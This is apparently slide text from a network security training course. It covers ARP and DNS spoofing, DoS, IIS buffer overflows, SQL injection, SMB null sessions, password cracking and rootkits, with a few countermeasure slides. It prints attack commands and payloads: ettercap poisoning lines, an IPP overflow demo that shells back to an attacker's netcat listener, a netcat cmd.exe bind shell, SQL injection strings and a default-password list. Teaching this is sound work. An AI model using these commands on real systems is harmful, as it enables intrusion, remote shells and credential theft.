Download - Day3 Backup
Network Security
and Hacking Techniques
Day-3
Network Security and Hacking Techniques – DAY-3
Typical Network- Hacking Techniques
“The Linux Based Services that Mean Business Securing Internet”
Visible IP
Address
InternalNetwork
PC Servers
Linux and windows
HostApplication Servers
Like IDS,Sniffers
I Want these systems
Network Security and Hacking Techniques – DAY-3
Network-Level Attacks
ARP Refresher
Sniffing Attacks
Sniffing Detection
Ettercap Example
DNS Cache Poisoning
Denial of Service Attacks
Network Security and Hacking Techniques – DAY-3
ARP Refresher
ARP Message Formats ARP packets provide mapping between hardware layer and
protocol layer addresses
28 byte header for IPv4 ethernet network
8 bytes of ARP data
20 bytes of ethernet/IP address data
6 ARP messages ARP request and reply
ARP reverse request and reply
ARP inverse request and reply
Network Security and Hacking Techniques – DAY-3
Gathering and Parsing Packets (Cont..)
IP Address Spoofing Variations
Network Security and Hacking Techniques – DAY-3
ARP Request Message
Source contains initiating system’s MAC address and IP address
Destination contains broadcast MAC address ff.ff.ff.ff.ff.ff
Network Security and Hacking Techniques – DAY-3
ARP Reply Message
Source contains replying system’s MAC address and IP address
Destination contains requestor’s MAC address and IP address
Network Security and Hacking Techniques – DAY-3
Unsolicited ARP Reply
Any system can spoof a reply to an ARP request
Receiving system will cache the reply
Overwrites existing entry
Adds entry if one does not exist
Usually called ARP poisoning
Network Security and Hacking Techniques – DAY-3
Types of Attack
Sniffing Attacks
Session Hijacking/MiM
Network Security and Hacking Techniques – DAY-3
Sniffing on a Hub
CIS COSYS TEMS
Sniffer Source Destination
Hub
Network Security and Hacking Techniques – DAY-3
Host to Host Exploit
Spoofed ARP ReplyC
Real ARP Reply
Broadcast ARP Request
Spoofed ARP ReplyS
Client (C) Server (S) Hostile
Network Security and Hacking Techniques – DAY-3
Host to Router Exploit
Real ARP Reply
Broadcast ARP Request
CISCOSYSTEMS
Spoofed ARP ReplyC
Spoofed ARP ReplyR
Client (C) Gateway Router (R) Hostile
Network Security and Hacking Techniques – DAY-3
Relay Configuration
M-1 M-3
0:c:3b:9:4d:8- 10.1.1.70:c:3b:1c:2f:1b- 10.1.1.2
0:c:3b:1a:7c:ef- 10.1.1.7 0:c:3b:1a:7c:ef- 10.1.1.2
0:c:3b:1a:7c:ef- 10.1.1.10
Attacker
Network Security and Hacking Techniques – DAY-3
Relay Configuration (cont.)
CISCOSYSTEMS
Sniffer Source Destination
Switch
Network Security and Hacking Techniques – DAY-3
Detection
OS Level Detection
Operating System
OS Level Detection Detection
Windows 95 NO
Windows 98 NO
Windows NT NO
Windows 2000 NO
Linux RedHat 7.0 NO
FreeBSD 4.2 YES
Network Security and Hacking Techniques – DAY-3
Hypothetical Detection Application
Purpose
Track and maintain ARP/IP pairings
Identify non-standard ARP-replies versus acceptable ones
• Timeout issues
OS must withstand corruption itself
Fix broken ARP entries of systems
• Transmission of correct ARP replies
Network Security and Hacking Techniques – DAY-3
Tools and Utilities
Manipulation
Dsniff 2.3
Hunt 1.5
Growing number of others
Local monitoring
Arpwatch 1.11
Network Security and Hacking Techniques – DAY-3
Tools - ARP Spoofing
Windows
Ettercap
Unix
Dsniff
Hunt
Network Security and Hacking Techniques – DAY-3
Ettercap
To start C:\ettercap –i dev1
• Try dev0, dev1, dev2, etc., until it finds your Ethernet adapter
• It takes a long time to scan the network
Network Security and Hacking Techniques – DAY-3
Ettercap Sniffing Options
Usage: ettercap [OPTION] [HOST:PORT] [HOST:PORT] [MAC] [MAC]
Sniffing method:
-a, --arpsniff ARPBASED sniffing (specifying two hosts)
SMARTARP (specifying one host but with the list
PUBLICARP (specifying only one host silently)
in silent mode : must specify both IP and MAC
i.e.: ettercap -Nza IP IP MAC MAC (ARPBASE
ettercap -Na IP MAC (SMARTARP
ettercap -Nza IP MAC (PUBLICAR
-s, --sniff IPBASED sniffing
you can specify the ANY ip that means ALL hosts
e.g.: ettercap -Nzs ANY:80 (sniff only http)
-m, --macsniff MACBASED sniffing
e.g.: ettercap -zm MAC1 MAC2
ettercap -Nm MAC
Off Line Sniffing:
-T, --readpcapfile OFFLINE sniffing (read packets from a file)
e.g.: ettercap -T file_dumped_from_tcpdump
-Y, --writepcapfile DUMP packets to a pcap compatible file format
e.g.: ettercap -NzsY file_to_be_dumped
Network Security and Hacking Techniques – DAY-3
Spoofing example with Ettercap HOST 1 telling that 10.1.1.7 is on 0:c:3b:1a:7c:ef
HOST 2 telling that 10.1.1.2 is on 0:c:3b:1a:7c:ef
(C:\ettercap –a 10.1.1.2 10.1.1.7 0:c:3b:1c:2f:1b 0:c:3b:9:4d:8)
now they are poisoned !! they will send their packets to us ! Then if we receive packets from:
HOST 1 we will forward to 0:c:3b:9:4d:8
HOST 2 we will forward to 0:c:3b:1c:2f:1b
M-1 M-30:c:3b:9:4d:8- 10.1.1.70:c:3b:1c:2f:1b- 10.1.1.2
0:c:3b:1a:7c:ef - 10.1.1.7 0:c:3b:1a:7c:ef - 10.1.1.2
0:c:3b:1a:7c:ef- 10.1.1.10Attacker
Network Security and Hacking Techniques – DAY-3
Bibliography
Finlayson, Mann, Mogul, Theimer, RFC 903 “A Reverse Address Resolution Protocol,” June 1984
Kra, Hunt 1.5, http://www.gncz.cz/kra/index.html, Copyright 2000
Lawrence Berkeley National Laboratory, Network Research Group, Arpwatch 1.11, ftp://ftp.ee.lbl.gov/arpwatch.tar.Z, Copyright 1996
Plummer, David C., RFC 826 “An Ethernet Address Resolution Protocol,” November 1982
Russel, Ryan and Cunningham, Stace, “Hack Proofing Your Network,”, Syngress Publishing Inc, Copyright 2000
Song, Dug, Dsniff 2.3, http://www.monkey.org/~dugsong/, Copyright 2000
Network Security and Hacking Techniques – DAY-3
Network-Level Attacks(Cont…)
Packet Sniffing:
Packet sniffer is a piece of software that grabs all of the traffic flowing
Dsniff –n –i 1
Network Security and Hacking Techniques – DAY-3
DNS Cache Poisoning
DNS Cache Poisoning
DNS ID Spoofing
DNS Hides Poisoning
Network Security and Hacking Techniques – DAY-3
DNS Cache Poisoning - TOOL
http://www.securiteinfo.com/download/wds.zip
This tool is a simple DNS ID Spoofer for Windows 9x/2K
the MAC address of the DNS server (or the default gateway if the DNS server is in another network).
Usage : wds -h
Example : wds -n www.microsoft.com -i 216.239.39.101 -g 00-00-39-5c-45-3b
Network Security and Hacking Techniques – DAY-3
Gathering and Parsing Packets (Cont..)
The ARP Cache poisoning:
Network Security and Hacking Techniques – DAY-3
Denial of Service Attacks
Network Security and Hacking Techniques – DAY-3
Denial of Service Attacks
DoS attacks are as old as the Internet itself
Year 2000 when a complete new quality of DoS attack started (DDoS).
(DDoS) stroke a huge number of prominent web sites including Yahoo, Ebay, Amazon and Buy.com
DDoS Concepts: Distributing the attack across several hosts. Coordinating the attack among many machines. Using the distribution system to thwart all attempts of discovering the origin of the attack.
Network Security and Hacking Techniques – DAY-3
Denial of Service Attacks
TCP Connections
Network Security and Hacking Techniques – DAY-3
Denial of Service Attacks (Cont…)
Abusing TCP: The Traditional SYN Flood
Network Security and Hacking Techniques – DAY-3
“Smurf”
Internet
Perpetrator V ictim
IC M P echo (spoofed source address of vic tim )Sent to IP broadcast address
IC M P echo reply
Network Security and Hacking Techniques – DAY-3
Denial of Service Attacks (Cont…)
The Development of Bandwidth Attacks
Network Security and Hacking Techniques – DAY-3
Denial of Service Attacks (Cont…)
DOS
Network Security and Hacking Techniques – DAY-3
Denial of Service Attacks (Cont…)
DDOS
Network Security and Hacking Techniques – DAY-3
Denial of Service Attacks (Cont…)
Distributed Reflection DOS
Network Security and Hacking Techniques – DAY-3
Denial of Service Attacks (Cont…)
Packet path diffusion
Network Security and Hacking Techniques – DAY-3
Denial of Service Attacks (Cont…)
Diffusing the path
Network Security and Hacking Techniques – DAY-3
Prevention Techniques
Ingress Filtering
Deployed by ISP's to drop packets with IP addresses outside the range of a customer’s network, so that they can prevent attackers from using forged source addresses to launch a DoS attack.
Egress Filtering
Prevents one’s network from being the source of forged communications used in DoS attacks.
Network Security and Hacking Techniques – DAY-3
Web Application Attacks
Introduction
Hacking Windows 2000: A Sample
SQL Injection: Manipulating Back-end Databases
Cross-Site Scripting
Network Security and Hacking Techniques – DAY-3
The Hacking Exposed Philosophy
“The most important step
towards securing your network
Is trying to break into it.”
Network Security and Hacking Techniques – DAY-3
Background
Most “script kiddies” will attack the OS and web server service.
They scan for web ports, search for vulnerabilities, and then attack.
The more sophisticated attacker will attack the custom application running on the web server.
Network Security and Hacking Techniques – DAY-3
Hacking Step 1: Scanning…
Step1: Using NMAP or Any port Scanner, he will find the ports are opened on those network and what application is running on those ports
Network Security and Hacking Techniques – DAY-3
Hacking Step 2: Vulnerability Scanning…
Web vulnerability scanners check for known holes.
Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items
#nikto.pl -h 206.135.57.178
-- nikto / v1.4.0 / rain forest puppy / www.wiretrip.net --
- Loaded script database of 1968 lines
= - = - = - = - = - =
= Host: 206.135.57.178
= Server: Apache/1.3.20 (Unix)
- www.apache.org
+ 404 Not Found: GET /cfdocs/
- Directory index: /scripts/
+ Found: GET /scripts/cfcache.map
+ 404 Not Found: GET /cfcache.map
+ 404 Not Found: GET /cfide/Administrator/startstop.html
Network Security and Hacking Techniques – DAY-3
Hacking Step 2: Vulnerability Identification
Search Internet for current vulnerabilities
http://www.google.com
http://www.securityfocus.com
http://www.packetstormsecurity.com/
Network Security and Hacking Techniques – DAY-3
Vulnerability Identification
www.SecurityFocus.com
Vulnerabilities by vendor
Vulnerabilities by BID
www.securityfocus.com/bid/<bid #>
Network Security and Hacking Techniques – DAY-3
Vulnerability Identification
www.packetstormsecurity.com Useful directory of site
http://packetstormsecurity.com/windows2000/
Network Security and Hacking Techniques – DAY-3
Hacking Windows 2000
More recently, the most effective way to compromise a Windows NT/2000 system is via Internet Information Server (IIS)
IIS is installed by default, listens on TCP 80; many don’t realize it’s there (and vulnerable…)
Those who run their Website on IIS can’t just block access to it
Windows 2000 ships with IIS version 5 (IIS5) Microsoft’s flagship Webserver has a long history of
security flaws It is debatable whether these flaws are more prevalent
in Microsoft code, or whether Microsoft’s code is simply more prevalent
(Yes, we’ll talk about Gartner later…)
Network Security and Hacking Techniques – DAY-3
Top Five Windows 2000 IIS Threats
Remote Command Execution Via Internet Printing Service
Microsoft IIS CGI Filename Decode Error Vulnerability
Remote command execution via Buffer Overflow in Indexing Service
Unauthorised SMTP relaying
Buffer Overflow i n FrontPage server extension
Network Security and Hacking Techniques – DAY-3
Remote Command Execution Via Internet Printing Service
Internet Printing is a new feature in Windows, introduced with the release of Windows 2000 Server.
It provides users with the ability to access a printer across an Intranet or the Internet and submit a job directly to the printer through the browser.
This functionality is enabled by default
The vulnerability exists in an unchecked buffer in the msw3prt.dll, allowing an attacker to post a string of approximately 420 characters that will cause the buffer to overflow and commands to be overwritten with the newly injected shell code.
Network Security and Hacking Techniques – DAY-3
IIS Buffer Overflows: IPP
Simple to exploit:
GET /null.printer HTTP/1.0
Host: [> 420 char. buffer]
Network Security and Hacking Techniques – DAY-3
IIS Buffer Overflows: IPP
Published exploits:
jill-win32.exe by dark spyrit
Iis5hack.exe by hsj
Remotely exploits buff. overflow, inserts shellcode to “shell” back to a listener on attacker’s system
Evil…
Network Security and Hacking Techniques – DAY-3
IIS Buffer Overflows: IPP
Network Security and Hacking Techniques – DAY-3
IPP Buffer Overflow DEMO
IPP Buffer Overflow DEMO
Start netcat listener on attacker’s system
nc –vv –l –p 23
Execute jill-win32:
jill-win32 victim 80 attacker 23
Shell pops up on attacker’s machine, SYSTEM context
Network Security and Hacking Techniques – DAY-3
Practicals
Try to compromise your server
Network Security and Hacking Techniques – DAY-3
SQL Scanning
TCP port 1433
SQL Server defaults to listen on these ports since ip-sockets net-lib is installed by default (along with named pipes)
UDP port 1434
Thanks to multiple instancing, having to know the exact port is not needed to connect since the net-libs will be more than happy to auto-connect you to the instance
Network Security and Hacking Techniques – DAY-3
SQL Scanning (cont.)
Starting nmapNT V. 2.53 SP1 by [email protected]
eEye Digital Security ( http://www.eEye.com )
based on nmap by [email protected] ( www.insecure.org/nmap/ )
Interesting ports on (10.6.6.205):
(The 1507 ports scanned but not shown below are in state: closed)
Port State Service
21/tcp open ftp
25/tcp open smtp
80/tcp open http
88/tcp open kerberos-sec
135/tcp open loc-srv
139/tcp open netbios-ssn
389/tcp open ldap
443/tcp open https
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
1026/tcp open nterm
1080/tcp open socks
1433/tcp open ms-sql-s -------
3389/tcp open msrdp
Network Security and Hacking Techniques – DAY-3
SQL Server Discovery
Multiple instancing capabilities of SQL Server 2000 make enumeration a functional requirement
A specially formed UDP packet directed at port 1434 will cause the SQL 2K listener service to divulge information about every instance of SQL Server running on that machine
Packet Information
• Instance names
• Net-libs supported
• TCP ports and pipe names
• Clustering support (juicy targets)
Network Security and Hacking Techniques – DAY-3
Broadcast Discovery
Since the listener may exist on multiple machines, it is possible to send a broadcast UDP packet to port 1434 to discover all instances of SQL Server 2000 on a subnet
sql –L (will return a raw listing)
Capture returned packets
Analyze
Network Security and Hacking Techniques – DAY-3
SQL Server Discovery
The following is a sample response from a SQL Server to the UDP broadcast:
(Captured using Snort-1.6.3 – http://www.snort.org)
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
[**] SQL Server Reply [**]
12/22-14:18:22.320099 10.6.7.37:1434 -> 10.6.6.194:4412
UDP TTL:128 TOS:0x0 ID:15054
Len: 133
.z.ServerName;DEV-REPORT2;InstanceName;MSSQLSERVER;IsClustered;N
o;Version;8.00.194;tcp;1433;np;\\DEV-REPORT2\pipe\sql\query;;
=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+
Network Security and Hacking Techniques – DAY-3
SQLPing Utility
Directs a custom udp packet at a specific target or subnet and enumerates the server info across multiple instances
Listening....
ServerName:LANDROVER
InstanceName:SQL2K
IsClustered:No
Version:8.00.194
tcp:1241
np:\\LANDROVER\pipe\MSSQL$SQL2K\sql\query
ServerName:LANDROVER
InstanceName:MSSQLServer
IsClustered:No
Version:7.00.623
np:\\LANDROVER\pipe\sql\query
tcp:1433
rpc:LANDROVER
http://www.sqlsecurity.com/utils/sqlping.zip
Network Security and Hacking Techniques – DAY-3
SQL Code Injection
Ability of an attacker to inject unintended SQL statements into application
Consequences
• Exposure of sensitive data
• SQL privilege escalation
• OS access
• COM+ access
Network Security and Hacking Techniques – DAY-3
Scope of SQL Injection
SQL injection attacks rarely alerts IDS systems especially over SSL
Difficult to track down all the areas of exploitation since the only real solution is manual code review
No amount OS security, firewalls, patch diligence will stop SQL injection.
The solution is good coding practices
Network Security and Hacking Techniques – DAY-3
SQL Injection Sample
ASP Code
<%
Set Conn =
Server.CreateObject("ADODB.Connection")
Conn.open “dsn=myapp;uid=sa;pwd=45nf3k332fhj“
Set RS = Conn.Execute("SELECT * from users where username=‘" & username & “’ AND password=‘“ & password & "’" )
%>
Network Security and Hacking Techniques – DAY-3
SQL Injection Example 1
Normal login
SQL Server sees
• select * from users where username=‘bob’ and password=‘b2oQeDr!’
• All is well (or so it seems)
Login Page
UserName: bob
Password: b2oQeDr!
Network Security and Hacking Techniques – DAY-3
SQL Injection Example 1
Malicious Login
SQL Server sees• select * from users where username=‘bob’ and
password=‘’ union select * from users where admin=1
• In this case the user logs in as the site administrator
Login Page
UserName: bob
Password: ‘ union select * from users where admin=1—
Network Security and Hacking Techniques – DAY-3
SQL Injection Example 2
Normal usage
Notice that on a search page we get immediate feedback – good target for injection
Also, since we see three columns we can assume that’s all the SQL statement is selecting
User SearchEnter Last Name : andrewsResults:Last First emailAndrews, chip [email protected]
Network Security and Hacking Techniques – DAY-3
SQL Injection Example 2
Malicious Usage
User Search
Enter Last Name : ‘ union select ’’,’’,@@version
Results:
Last First emailMicrosoft SQL Server 2000
- 8.00.194 (Intel X86) Aug 6 2000 00:57:48 Copyright (c) 1988-2000 Microsoft Corporation Standard Edition on Windows NT 5.0 (Build 2195: Service Pack 1)
Network Security and Hacking Techniques – DAY-3
SQL Injection Samples
Problems
Poor input validation
Secret in ASP code (source code disclosure)
Poorly typed – SQL server and ASP not checking data-types
Security context too high for needed functionality
Network Security and Hacking Techniques – DAY-3
Best Practices
Use principle of least-privilege
Assign MSSQLServer service non-administrator user context
Take the time to properly implement trusted security (Integrated Mode)
Don’t place passwords in script
Assign complex ‘sa’ password even when using Integrated security
Consider dropping certain procedures in the interest of security. They can always be added later.
Network Security and Hacking Techniques – DAY-3
Operating System and Application-Level Attacks
Password Cracking With L0phtCrack
NetBios/SMB Hacking
Buffer Overflows in Depth
Examples of remote root exploit through buffer overflow
Root Kits
Network Security and Hacking Techniques – DAY-3
NetBios/SMB Hacking
Introduction
SMB/NetBios Explained and Exploited
Win2k Architecture
Network and Host Enumeration
Penetration
Pillaging Hosts
Escalation
Summary and Wrap-up
Network Security and Hacking Techniques – DAY-3
SMB/NetBios Explained and Exploited
SMB is Server Message Blocks
A protocol over NetBios or TCP
Used for “net use” type communications
• UDP port 137 (name services)
• UDP port 138 (datagram services)
• TCP port 139 (session services)
NT uses port 139
Win2k uses ports 139 and/or 445
Network Security and Hacking Techniques – DAY-3
SMB/NetBios Explained and Exploited
Mapping a drive syntax will prompt for password
Null Session is no user with no password Access to TCP 139, 445, IPX, or NetBEUI
Null session not meaningfully logged
Normal part of other network operations
Hackers can use to enumerate network
net use * \\target\share */user:domain\username
net use \\target\share “” /user:””
Network Security and Hacking Techniques – DAY-3
Host Enumeration
Just to reiterate… We are connecting with aBLANK username and a BLANK password
This functionality is enabled by default on NT/2000 (port 445 also)
This is one of the most debilitating vulnerabilities faced by NT/2000 deployments of all sizes!!!!
This connection is not logged in the Event Log, nor is it recorded by a majority of the Host Based IDS products
Network Security and Hacking Techniques – DAY-3
Penetration
The primary goal is to authenticate ourselves to the remote host. We can do this by:
Guessing username / password combinations,
Obtaining the user hashes, or
Exploiting a vulnerable service
Network Security and Hacking Techniques – DAY-3
Password Guessing
Guessing Username/Password combinations:
Review results from DumpSec output
Identify those that:
• haven’t changed their passwords recently
• haven’t logged on recently
• are members of the admin group
• may be a shared group account
• are lab or test accounts
• have juicy info in the comment field
Network Security and Hacking Techniques – DAY-3
Guessing Passwords
NT/2000 does not support logging on with multiple credentials simultaneously, so:
Log off as null session user:
net use * /del
Attempt to logon as target user:
net use \\target\ipc$ * /user:target\username
Network Security and Hacking Techniques – DAY-3
Password Guessing
High Probability Combinations: administrator blank, password, administrator
arcserve arcserve, backup
test test, password
lab lab, password
username username, company_name
backup backup
tivoli tivoli
symbiator symbiator, as400
backupexec backup
Network Security and Hacking Techniques – DAY-3
enum Brute Force Features
usage: enum [switches] [hostname|ip]
-U: get userlist
-M: get machine list
-N: get namelist dump (different from -U|-M)
-S: get sharelist
-P: get password policy information
-G: get group and member list
-L: get LSA policy information
-D: dictionary crack, needs -u and -f
-d: be detailed, applies to -U and -S
-c: don't cancel sessions
-u: specify username to use (default "")
-p: specify password to use (default "")
-f: specify dictfile to use (wants -D)
Network Security and Hacking Techniques – DAY-3
enum Brute Force Features
Network Security and Hacking Techniques – DAY-3
Password Guessing
Countermeasures
Enable lockout for all accounts
Use passprop to enable Admin lockout (remote only, not TS)
Enforce password policy (passfilt, KB Q161990, W2K Account Policy)
Audit logon/logoff failures
Treat the Administrator and Domain Admins accounts as holders of the keys to the kingdom – they are!
Network Security and Hacking Techniques – DAY-3
Sniffing Password Data
NT/2000 uses a challenge/response authentication mechanism
Neither passwords nor their hashes are sent across the wire
However, The L0pht discovered a way to extract hashes from the logon exchange
SMB Packet Capture
L0pht Crack (2.52) works on an NT4 machine but does not work on Win 2000
Version 3 incorporates a new packet driver that works?[not yet] on Win 2000
ScoopLM from SecurityFriday does work on Win2k
Network Security and Hacking Techniques – DAY-3
Sniffing Passwords..L0pht
Network Security and Hacking Techniques – DAY-3
Sniffing Passwords..ScoopLM
Network Security and Hacking Techniques – DAY-3
Cracking Passwords
Once you’ve obtained password hashes, there’s no good reason not to start cracking them immediately
Several tools have been written to optimize this process
The best are: L0phtcrack
John the Ripper
BeatLM for use with ScoopLM
Network Security and Hacking Techniques – DAY-3
Cracking Passwords
L0phtcrack
Network Security and Hacking Techniques – DAY-3
Cracking Passwords
John the Ripper Version 1.6 Copyright (c) 1996-98 by Solar Designer
Usage: john [OPTIONS] [PASSWORD-FILES]
-single "single crack" mode
-wordfile:FILE –stdin wordlist mode, read words from FILE or stdin
-rules enable rules for wordlist mode
-incremental[:MODE] incremental mode [using section MODE]
-external:MODE external mode or word filter
-stdout[:LENGTH] no cracking, just write words to stdout
-restore[:FILE] restore an interrupted session [from FILE]
-session:FILE set session file name to FILE
-status[:FILE] print status of a session [from FILE]
-makechars:FILE make a charset, FILE will be overwritten
-show show cracked passwords
-test perform a benchmark
-users:[-]LOGIN|UID[,..] load this (these) user(s) only
-groups:[-]GID[,..] load users of this (these) group(s) only
-shells:[-]SHELL[,..] load users with this (these) shell(s) only
-salts:[-]COUNT load salts with at least COUNT passwords only
-format:NAME force ciphertext format NAME (DES/BSDI/MD5/BF/AFS/LM)
-savemem:LEVEL enable memory saving, at LEVEL 1..3
Network Security and Hacking Techniques – DAY-3
Cracking Passwords
Countermeasure
Enforce password length of exactly 7 characters
All passwords should meet complexity minimums, such as different case, numerals, and punctuation
Network Security and Hacking Techniques – DAY-3
Get Interactive Overview
If we are truly to become the machine there are certain things we must do
Firstly, copy up our Admin Kit
Second, is to gain an interactive shell
Last is to prepare target machine in order to launch further attacks
Network Security and Hacking Techniques – DAY-3
Get Interactive
Map to a drive on the target host and copy over the followin files:
fscan
Netcat
Local
Global
Pwdump2,3
Remote
Lsadump2
Cp
DumpSec
Getmac
Netdom
Nltest
Network Security and Hacking Techniques – DAY-3
Get Interactive : REMOTE.EXE
Launch remote.exe on the target host
Syntax: remote /s “cmd.exe” [secret]
Connect to remote pipe
Syntax remote /c hostname [secret]
Network Security and Hacking Techniques – DAY-3
Get Interactive : NC.EXE
Netcat syntax on remote host: nc –l –d –p 2002 –e “cmd.exe”
Netcat syntax to connect to listener nc –n –v target_ip 2002
This is the preferable method, but it only works
over IP. Great when 139 is blocked.
Network Security and Hacking Techniques – DAY-3
Operating System and Application-Level Attacks
Buffer Overflows in Depth
Buffer Overflow Exploit
In general, buffer overflow attack involves the following steps:
i. stuffing more data into a buffer than it can handle
ii. overwrites the return address of a function
iii.switches the execution flow to the hacker code
Network Security and Hacking Techniques – DAY-3
Operating System and Application-Level Attacks
Process Memory Region
Network Security and Hacking Techniques – DAY-3
RootKit
Root Kits
Rootkit name are combination from two words, root and kit
Collection of tools that enable attacker to keep the root power
Type of Rootkit
Application rootkit - established at the application layer.
Kernel rootkit - establish more deep into kernel layer.
Network Security and Hacking Techniques – DAY-3
Application Rootkit
Programs replace to hide attacker presence.
Examples ls,ps,top,du,find,ifconfig,lsof
Network Daemons with backdoor
Sniffer Program
Kernel Rootkit
Hiding processes.
Hiding files
Hiding the sniffer.
Hiding the File System
RootKit (Cont…)
Network Security and Hacking Techniques – DAY-3
NT Rootkit
Process hiding
Network Security and Hacking Techniques – DAY-3
NT Rootkit
File hiding
Network Security and Hacking Techniques – DAY-3
NT Rootkit
Rootkit console with Keyboard sniffing
Network Security and Hacking Techniques – DAY-3
Detecting hidden processes
Two Software
Network Security and Hacking Techniques – DAY-3
Anonymity on the web
Anonymity and the Internet
Anonymizing proxy
Case Studies – Anonymity WebSite
Case Studies – Anonymity Softwares
Questions
Network Security and Hacking Techniques – DAY-3
Anonymity and the Internet
Anonymity: the state of being unknown or unfamiliar
Sometimes it is important for one’s identity to remain anonymous
Why might individuals want their identity to remain anonymous?
People generally do not like to be tracked without their knowledge. The average web surfer and Internet hacker wishes to remain anonymous.
Network Security and Hacking Techniques – DAY-3
Anonymity and the Internet
There are many ways user information can be discovered.
An individual’s location or identity can be determined using “cookies” and/or an IP address
Cookie: a small piece of information that a server stores on the user’s computer. Example: a yellow pages site
IP address: a series of four numbers which uniquely identify your computer on the Internet. Example: 129.186.1.201
ISP’s keep track of the IP addresses their customers use, and may also keep records of names and pseudonyms
Network Security and Hacking Techniques – DAY-3
Anonymizing proxy
Acts as a proxy for users
Hides information from end servers
Sees all web traffic
Free and subscription services available
Some free services add advertisements to web pages
ProxyBrowserEnd
Server
Request Request
ReplyReply
Network Security and Hacking Techniques – DAY-3
Case Studies – Anonymity WebSite
Anonymizer.com
Proxify.com
Network Security and Hacking Techniques – DAY-3
Case Studies – Anonymity Software
JAP
It is integrated
with Browser
Network Security and Hacking Techniques – DAY-3
Case Studies – Anonymity Software
HopsterBypass Firewall, Bypass Proxy
Network Security and Hacking Techniques – DAY-3
Anonymity on the web
Questions ??